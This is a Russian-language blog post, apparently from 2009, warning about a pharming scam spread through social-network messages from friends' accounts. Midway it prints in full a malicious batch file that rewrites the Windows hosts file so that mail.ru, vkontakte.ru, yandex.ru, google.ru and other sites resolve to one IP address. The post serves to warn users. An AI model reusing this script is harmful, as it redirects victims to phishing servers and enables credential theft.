Фарминг В Социальных Сетях

Похоже, началась очередная эпидемия фарминг через социальные сети.

В одной из известных популярных социальных сетей (а может быть, не в одной?) друзьям через систему личных сообщений рассылаются следующие сообщения:

Один нужный мне файл у меня не работает, можете сами проверить?
На что человек, естественно, получает ответ:
могу, привет)
И через некоторое время он получает следующее сообщение:
urlshort.me **файл запускается без ошибок?))
(Я специально закрыл адрес звездочками, чтобы не кликать :) Как человек, наученный жизненным опытом (в том числе и своим), я перешел по ссылке с помощью браузера в режиме инкогнито.

Сокращенная ссылка ведет на один из популярных файлообменников, с которого предлагают скачать файл.



qip_unfium.bat

Ничего не подозревающий пользователь нажимает на этот файл, желая помочь другу справиться с проблемой с Quip Unfium, и.

выполняется следующий код:



@rem ----- ExeScript Options Begin ----- @rem ScriptType: console @rem DestDirectory: temp @rem Icon: default @rem ----- ExeScript Options End ----- @echo off echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts

Кстати, перед телом самого скрипта 662 пустые строки.

Последствия выполнения этого сценария не нужно упоминать.

Мораль? В стотысячный раз напоминаю: остерегайтесь фейков и проверьте у друзей, действительно ли они отправили вам такую ссылку.

UPD от 16 ноября 2009: Вторая часть Марлезонского балета .

:-) Теги: #фермерство #Социальные сети #vkontakte.ru #odnoklassniki.ru #mail.ru #google.ru #rambler.ru #mail.i.ua #информационная безопасность

Вместе с данным постом часто просматривают:

Автор Статьи


Зарегистрирован: 2019-12-10 15:07:06
Баллов опыта: 0
Всего постов на сайте: 0
Всего комментарий на сайте: 0
Dima Manisha

Dima Manisha

Эксперт Wmlog. Профессиональный веб-мастер, SEO-специалист, дизайнер, маркетолог и интернет-предприниматель.